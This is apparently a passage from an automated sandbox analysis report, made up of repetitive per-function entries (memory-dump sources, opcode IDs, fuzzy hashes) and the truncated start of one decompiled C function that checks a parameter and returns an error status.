                                                              • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB01D4, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                              • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                              • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                              • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB010C, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                              • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                              • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                              • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB1148, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                              • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                              • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                              • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAF8CC, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                              • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                              • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                              • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAF938, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                              • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                              • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                              • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB1930, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                              • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                              • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                              • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFAB8, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFA20, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                              • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                              • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                              • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFA50, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                              • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                              • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                              • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFBE8, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                              • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                              • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                              • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFB50, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFC30, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                              • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                              • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                              • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFC48, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                              • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                              • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                              • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB0C40, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB1D80, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFD5C, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFE24, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFFFC, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFF34, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AD8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E00AD8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
